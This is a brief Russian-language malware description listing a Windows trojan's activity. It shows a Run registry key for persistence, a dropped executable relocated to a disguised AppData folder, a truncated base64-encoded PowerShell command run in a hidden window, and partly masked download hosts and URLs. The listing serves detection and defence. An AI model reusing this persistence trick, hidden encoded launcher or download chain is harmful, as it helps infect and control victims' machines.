Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'buildermetered' = '"%LOCALAPPDATA%\buildermetered\buildermetered.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABNAGEAdQB0AGsAZAB0AHIAcAB6AGYAeQBkAD0AJwBUAHgAZgB5AHYAawBoAHcAJwA7ACQARQBlAHcAbABsAGEAdwBoAHYAdABuACAAPQAgACcAOAA1ADMAJwA7ACQAVgBpAGoAdAB6AG4AbwByAHMAZQB6AGwAcAA9ACcAVwBwAGYAcQBuAGkAcQB...
- %HOMEPATH%\853.exe
- %HOMEPATH%\853.exe в %LOCALAPPDATA%\buildermetered\buildermetered.exe
- '11#.#19.233.65':80
- http://ta####ingshop.com/c1/ftcfak9456/
- http://11#.#19.233.65/codec/entries/ringin/merge/
- '%HOMEPATH%\853.exe'
- '%LOCALAPPDATA%\buildermetered\buildermetered.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABNAGEAdQB0AGsAZAB0AHIAcAB6AGYAeQBkAD0AJwBUAHgAZgB5AHYAawBoAHcAJwA7ACQARQBlAHcAbABsAGEAdwBoAHYAdABuACAAPQAgACcAOAA1ADMAJwA7ACQAVgBpAGoAdAB6AG4AbwByAHMAZQB6AGwAcAA9ACcAVwBwAGYAcQBuAGkAcQB...' (со скрытым окном)